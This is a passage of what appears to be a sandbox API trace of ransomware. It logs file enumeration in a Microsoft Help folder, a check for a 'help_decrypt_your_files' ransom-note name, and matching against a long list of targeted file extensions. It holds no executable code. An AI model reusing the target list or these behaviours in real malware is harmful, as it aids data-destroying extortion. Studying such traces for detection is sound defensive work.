rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".hxn") returned 0x0
	[0177.864] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x50b37f08, ftCreationTime.dwHighDateTime=0x1d8a64c, ftLastAccessTime.dwLowDateTime=0x50b37f08, ftLastAccessTime.dwHighDateTime=0x1d8a64c, ftLastWriteTime.dwLowDateTime=0x50bcbaa5, ftLastWriteTime.dwHighDateTime=0x1d8a64c, nFileSizeHigh=0x0, nFileSizeLow=0x170, dwReserved0=0x0, dwReserved1=0x0, cFileName="MS.MSACCESS.16.1033.hxn", cAlternateFileName="MSMSAC~1.HXN")) returned 1
	[0177.864] lstrcmpW (lpString1="MS.MSACCESS.16.1033.hxn", lpString2="..") returned 1
	[0177.864] lstrcmpW (lpString1="MS.MSACCESS.16.1033.hxn", lpString2=".") returned 1
	[0177.864] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\All Users\\Microsoft Help\\" | out: lpString1="C:\\Users\\All Users\\Microsoft Help\\") returned="C:\\Users\\All Users\\Microsoft Help\\"
	[0177.864] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft Help\\", lpString2="MS.MSACCESS.16.1033.hxn" | out: lpString1="C:\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.16.1033.hxn") returned="C:\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.16.1033.hxn"
	[0177.865] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.16.1033.hxn") returned 57
	[0177.865] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0177.865] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.16.1033.hxn", cchLength=0x39 | out: lpsz="c:\\users\\all users\\microsoft help\\ms.msaccess.16.1033.hxn") returned 0x39
	[0177.865] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.865] StrStrW (lpFirst="c:\\users\\all users\\microsoft help\\ms.msaccess.16.1033.hxn", lpSrch="help_decrypt_your_files") returned 0x0
	[0177.865] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\all users\\microsoft help\\ms.msaccess.16.1033.hxn" | out: lpString1="c:\\users\\all users\\microsoft help\\ms.msaccess.16.1033.hxn") returned="c:\\users\\all users\\microsoft help\\ms.msaccess.16.1033.hxn"
	[0177.865] lstrlenW (lpString="c:\\users\\all users\\microsoft help\\ms.msaccess.16.1033.hxn") returned 57
	[0177.865] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0177.866] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.866] StrStrW (lpFirst=".hxn", lpSrch=".") returned=".hxn"
	[0177.866] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.866] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".hxn") returned 0x0
	[0177.866] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x5c595587, ftCreationTime.dwHighDateTime=0x1d8a64c, ftLastAccessTime.dwLowDateTime=0x5c595587, ftLastAccessTime.dwHighDateTime=0x1d8a64c, ftLastWriteTime.dwLowDateTime=0x5cef69b7, ftLastWriteTime.dwHighDateTime=0x1d8a64c, nFileSizeHigh=0x0, nFileSizeLow=0x15e, dwReserved0=0x0, dwReserved1=0x0, cFileName="MS.MSOUC.16.1033.hxn", cAlternateFileName="MSMSOU~1.HXN")) returned 1
	[0177.866] lstrcmpW (lpString1="MS.MSOUC.16.1033.hxn", lpString2="..") returned 1
	[0177.866] lstrcmpW (lpString1="MS.MSOUC.16.1033.hxn", lpString2=".") returned 1
	[0177.867] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\All Users\\Microsoft Help\\" | out: lpString1="C:\\Users\\All Users\\Microsoft Help\\") returned="C:\\Users\\All Users\\Microsoft Help\\"
	[0177.867] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft Help\\", lpString2="MS.MSOUC.16.1033.hxn" | out: lpString1="C:\\Users\\All Users\\Microsoft Help\\MS.MSOUC.16.1033.hxn") returned="C:\\Users\\All Users\\Microsoft Help\\MS.MSOUC.16.1033.hxn"
	[0177.867] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft Help\\MS.MSOUC.16.1033.hxn") returned 54
	[0177.867] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0177.867] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\MS.MSOUC.16.1033.hxn", cchLength=0x36 | out: lpsz="c:\\users\\all users\\microsoft help\\ms.msouc.16.1033.hxn") returned 0x36
	[0177.867] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.867] StrStrW (lpFirst="c:\\users\\all users\\microsoft help\\ms.msouc.16.1033.hxn", lpSrch="help_decrypt_your_files") returned 0x0
	[0177.867] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\all users\\microsoft help\\ms.msouc.16.1033.hxn" | out: lpString1="c:\\users\\all users\\microsoft help\\ms.msouc.16.1033.hxn") returned="c:\\users\\all users\\microsoft help\\ms.msouc.16.1033.hxn"
	[0177.868] lstrlenW (lpString="c:\\users\\all users\\microsoft help\\ms.msouc.16.1033.hxn") returned 54
	[0177.868] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0177.868] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.868] StrStrW (lpFirst=".hxn", lpSrch=".") returned=".hxn"
	[0177.868] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.868] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".hxn") returned 0x0
	[0177.869] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x63cb40e0, ftCreationTime.dwHighDateTime=0x1d8a64c, ftLastAccessTime.dwLowDateTime=0x63cb40e0, ftLastAccessTime.dwHighDateTime=0x1d8a64c, ftLastWriteTime.dwLowDateTime=0x63d40755, ftLastWriteTime.dwHighDateTime=0x1d8a64c, nFileSizeHigh=0x0, nFileSizeLow=0x15e, dwReserved0=0x0, dwReserved1=0x0, cFileName="MS.MSPUB.16.1033.hxn", cAlternateFileName="MSMSPU~1.HXN")) returned 1
	[0177.869] lstrcmpW (lpString1="MS.MSPUB.16.1033.hxn", lpString2="..") returned 1
	[0177.869] lstrcmpW (lpString1="MS.MSPUB.16.1033.hxn", lpString2=".") returned 1
	[0177.869] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\All Users\\Microsoft Help\\" | out: lpString1="C:\\Users\\All Users\\Microsoft Help\\") returned="C:\\Users\\All Users\\Microsoft Help\\"
	[0177.869] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft Help\\", lpString2="MS.MSPUB.16.1033.hxn" | out: lpString1="C:\\Users\\All Users\\Microsoft Help\\MS.MSPUB.16.1033.hxn") returned="C:\\Users\\All Users\\Microsoft Help\\MS.MSPUB.16.1033.hxn"
	[0177.869] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft Help\\MS.MSPUB.16.1033.hxn") returned 54
	[0177.869] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0177.877] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\MS.MSPUB.16.1033.hxn", cchLength=0x36 | out: lpsz="c:\\users\\all users\\microsoft help\\ms.mspub.16.1033.hxn") returned 0x36
	[0177.877] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.877] StrStrW (lpFirst="c:\\users\\all users\\microsoft help\\ms.mspub.16.1033.hxn", lpSrch="help_decrypt_your_files") returned 0x0
	[0177.877] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\all users\\microsoft help\\ms.mspub.16.1033.hxn" | out: lpString1="c:\\users\\all users\\microsoft help\\ms.mspub.16.1033.hxn") returned="c:\\users\\all users\\microsoft help\\ms.mspub.16.1033.hxn"
	[0177.877] lstrlenW (lpString="c:\\users\\all users\\microsoft help\\ms.mspub.16.1033.hxn") returned 54
	[0177.877] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0177.878] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.878] StrStrW (lpFirst=".hxn", lpSrch=".") returned=".hxn"
	[0177.878] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.878] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk